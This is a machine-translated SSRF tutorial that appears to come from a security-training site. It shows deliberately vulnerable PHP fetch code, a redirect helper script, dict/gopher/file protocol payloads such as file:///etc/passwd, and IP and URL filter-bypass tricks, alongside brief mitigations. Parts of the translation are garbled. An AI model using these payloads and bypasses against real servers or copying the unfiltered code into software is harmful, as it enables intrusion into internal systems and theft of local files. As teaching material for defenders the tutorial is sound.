1. Introduction to SSRF
SSRF, server-side Request Forgery, is a vulnerability constructed by an attacker to cause a Request to be initiated by the Server. Generally, SSRF attacks target internal systems that cannot be accessed from the Internet.
The reason for the formation of vulnerabilities is mostly because the server provides the function of obtaining data from other server applications and does not filter and restrict the target address.
There are five main types of attacks that can be implemented by an attacker using SSRF:
1. You can scan ports on the external network, the Intranet where the server resides, and the local network to obtain banner information of some services
2. Attack Intranet or local applications (such as overflow)
3. Fingerprint the Intranet WEB application by accessing the default file
4. Attack web applications on Internet and extranet, mainly using the GET parameter (such as Struts2, SQli, etc.)
5. Read local files using file protocol
2. Scenarios where SSRF vulnerabilities appear
SSRF vulnerabilities may exist where network requests can be initiated externally
Request resources from a remote server (Upload from URL, Import & Export RSS feeds)
Built-in database functions (Oracle, MongoDB, MSSQL, Postgres, CouchDB)
Webmail Receives mails from other mailboxes (POP3, IMAP, SMTP)
File processing, encoding processing, attribute information processing (FFMPEG, ImageMagic, DOCX, PDF, XML)
3. Common back-end implementation
1, file_get_contents,
if (isset($_POST['url'])) {
$content = file_get_contents($_POST['url']);
$filename ='./images/'.rand().'; img1.jpg';
file_put_contents($filename, $content);
echo $_POST['url'];
$img = "<img src=\"".$filename."\" / >";
}
echo $img;
? >
Copy the codeThis code uses the file_get_contents function to retrieve the image from the user-specified URL. It is then saved on the hard disk with a random file name and shown to the user.
2, fsockopen ()
function GetFile($host,$port,$link) {
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if(! $fp) {echo "$errstr (error number $errno) \n";
} else {
$out = "GET $link HTTP / 1.1 \ r \ n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents=' ';
while(! feof($fp)) { $contents.= fgets($fp,1024);
}
fclose($fp);
return$contents; }}? >
Copy the codeThis code uses the fsockopen function to get the data (file or HTML) of the user-specified URL. This function uses the socket to set up a TCP connection with the server and transmit raw data.
3, the curl_exec ()
if (isset($_POST['url'])) {
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);
$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result);
echo $result;
}
? >
Copy the codeUsing curl to retrieve data
4. Scenarios that hinder SSRF vulnerability exploitation
If OpenSSL is enabled on the server, it cannot be used interactively
The server requires authentication (Cookies & User: Pass) and cannot be used perfectly
Limit the request to a common HTTP port, for example, 80,443,8080,8090.
Disable unnecessary protocols. Only HTTP and HTTPS requests are allowed. To prevent similar to file:/// gopher://, problems caused by ftp://, etc.
The unified error information prevents users from determining the port status of the remote server based on the error information.
5. Use SSRF for port scanning
Most applications do not determine the port status based on the returned banner information.
The backend implementation
if (isset($_POST['url'])) {
$link = $_POST['url'];
$filename = './curled/'.rand().'txt';
$curlobj = curl_init($link);
$fp = fopen($filename,"w");
curl_setopt($curlobj, CURLOPT_FILE, $fp);
curl_setopt($curlobj, CURLOPT_HEADER, 0);
curl_exec($curlobj);
curl_close($curlobj);
fclose($fp);
$fp = fopen($filename,"r");
$result = fread($fp, filesize($filename));
fclose($fp);
echo $result;
}
? >
Copy the codeConstruct a front page
<html>
<body>
<form name="px" method="post" action="http://127.0.0.1/ss.php">
<input type="text" name="url" value="">
<input type="submit" name="commit" value="submit">
</form>
<script></script>
</body>
</html>
Copy the codeRequesting a non-HTTP port returns banner information.
You can also use 302 hops to bypass the HTTP protocol.
Auxiliary script
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
? >
Copy the codeTencent somewhere SSRF vulnerability (very good use point) attached to the use of scripts
6. Agreement utilization
Dict agreement
dict://fuzz.wuyun.org:8080/helo:dict
Copy the codeGopher protocol
gopher://fuzz.wuyun.org:8080/gopher
Copy the codeThe File agreement
file:///etc/passwd
Copy the code7. Bypass posture
1. Change the IP address, for example, 192.168.0.1
The value is 0300.0250.0.1
The value is in hexadecimal format 0xC0.0xA8.0.1
The value is a decimal integer in the format of 3232235521
The value is a hexadecimal integer 0xC0A80001
There is also a special ellipsis mode, such as 10.0.0.1. The IP can be written as 10.1
2. Using URL parsing in some cases, the back-end program may parse the accessed URL and filter the host address resolved. In this case, the URL parameters may not be resolved properly and the filtering may be bypassed. Such as:
Both http://[email protected]/ and http://192.168.0.1 request the contents of 192.168.0.1
Can point to any IP domain xip. IO: http://127.0.0.1.xip.io/== > http://127.0.0.1/
Short address http://dwz.cn/11SMa== > http://127.0.0.1
Use periods. : 127. 0. 0. 1 = = > 127.0.0.1
Using the Enclosed alphanumerics
ⓔ ⓧ ⓐ ⓜ ⓟ ⓛ ⓔ. ⓒ ⓞ ⓜ > > > example.com List: (1) (2) (3) (4) (5) 6 7 was pet-name ruby attending ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ (1) (3) (4) [2] [5] [6] once being 'levies ⑽ ⑾ ⑿ [13] [14] ⒂ displayed ⒄ ⒅ trick ⒇ manner 2. 3. 4. ⒌ pictures but ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿Copy the code8, harm
You can scan ports on the external network, the Intranet where the server resides, and the local network to obtain banner information of some services.
Attacking Intranet or local applications (such as overflow);
Fingerprint identification is performed on Intranet Web applications by accessing default files.
The attack on web applications on Internet and extranet is mainly the attack that can be realized by using the get parameter (such as Struts2, SQli, etc.).
Use file protocol to read local files.
9. References
Build Your SSRF EXP Autowork
Tencent somewhere SSRF vulnerability (very good use point) attached to the use of scripts
From information leakage to SSRF to command execution at a sub-station in Bilibili
10, description,
Related practice experiment
SSRF vulnerability analysis and practice
SSRF Vulnerability Advanced Practice – Attacking Intranet Redis
SSRF Vulnerability Advanced Practice – StrutS2-S2-32 vulnerability exploitation
About hetian Net security laboratory
Hetian Network security Laboratory (www.hetianlab.com) – China’s leading practical network security online education platform
Real environment, online practice learning network security; The experiment covers: system security, software security, network security, Web security, mobile security, CTF, forensic analysis, penetration testing, network security awareness education, etc.
Transfer statement
This article is adapted from SSRF Server Request Forgery – CTF Wiki
This article is modified from the SSRF Server Request Forgery – CTF Wiki article.
The entire content of this article is provided under the terms of THE CC BY-NC-SA 4.0 agreement, additional terms may apply.